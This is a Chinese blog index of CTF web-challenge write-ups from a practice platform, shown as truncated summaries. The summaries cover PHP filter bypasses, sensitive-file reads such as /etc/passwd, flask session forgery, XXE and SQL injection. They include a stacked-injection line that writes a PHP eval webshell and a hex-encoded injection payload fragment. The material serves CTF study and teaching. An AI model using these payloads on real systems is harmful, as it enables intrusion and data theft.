随笔分类 - buu刷题
摘要:# [WMCTF2020]Make PHP Great Again 0x01前言 php小技巧 0x02php小技巧 /proc/self指向当前进程的/proc/pid/,/proc/self/root/是指向/的符号链接,想到这里,用伪协议配合多级符号链接的办法进行绕过。 payload=ph
阅读全文
摘要:# [CISCN2019 华东南赛区]Web4 0X01前言 敏感文件读取 flask session伪造 0x02敏感文件读取 读取常见目录 /etc/passwd 用来判断读取漏洞的存在 /etc/environment 是环境变量配置文件之一。环境变量可能存在大量目录信息的泄露,甚至可能出现
阅读全文
摘要:# [SUCTF 2018]MultiSQL 0x01前言 堆叠注入写shell 0x02预编译写shell 需要执行的语句select '<?php @eval($_POST[abc]);?>' into outfile '/var/www/html/favicon/abc.php' 为什么选f
阅读全文
摘要:# [FireshellCTF2020]Caas 0x01前言 读取报错信息 0x02读取报错信息 开局一个框 输入print("213123") 是个.c结尾的文件, 输入 #include <stdio.h> int main() { /* 我的第一个 C 程序 */ printf("Hell
阅读全文
摘要:# [N1CTF 2018]eating_cms 0x01知识点 parse_url函数解析漏洞 parse_url`函数在解析url时存在的bug 通过:`///x.php?key=value`的方式可以使其返回`False 命令执行 伪协议读取文件 0x02.解题 先注册登录 观察url 可能
阅读全文
摘要:## [CSAWQual 2019]Web_Unagi 0x01.前言 XXE注入编码绕过 0x02.知识点学习 iconv -f utf8 -t utf16 1.xml>2.xml 0x03.解题 看到标签格式 <users> <user> <username>bob</username> <p
阅读全文
摘要:# [BSidesCF 2019]SVGMagic 0x01.涉及知识点: XXE **file:///proc/self/pwd/**为当前目录 0x02.知识学习 参考连接:xxe漏洞的学习与利用总结 XML结构: DTD(文档类型定义) 内部声明: ex: <!DOCTYOE test an
阅读全文
摘要:# [强网杯 2019]Upload 0x01.前言 代码审计 反序列化 0x02.开始审计 tp5框架,打开controller文件夹开始审计 根据网站顺序从index.php->register.php->login.php->profile index.php <?php namespace
阅读全文
摘要:# [MRCTF2020]Ezaudit 0x01前言 伪随机数 万能密码 www.zip备份源码 0x02知识补充 mt_rand()生成的随机数是可以预测的,只要找到种子。 找种子工具php_mt_seed-4.0.tar.gz 先把加密后的值转化成工具能利用的值 脚本: # -*- codi
阅读全文
摘要:[GXYCTF2019]StrongestMind 0x01前言 python爬虫requests.session() 0x02上脚本 # -*- coding: utf-8 -*- import requests import re import time headers={ 'User-Agen
阅读全文
摘要:# Avatar Uploader 0x01关键代码 $finfo = finfo_open(FILEINFO_MIME_TYPE); $type = finfo_file($finfo, $_FILES['file']['tmp_name']); finfo_close($finfo); if
阅读全文
摘要:# [网鼎杯2018]Unfinish 0x01.前言 过滤了,分割时使用from 1 for 10绕过 0'+hex编码要读取的信息+'0 要进行二次编码一次编码会被截断 解法1 payload:0'+(select substr(hex(hex((select * from flag))) f
阅读全文

浙公网安备 33010602011771号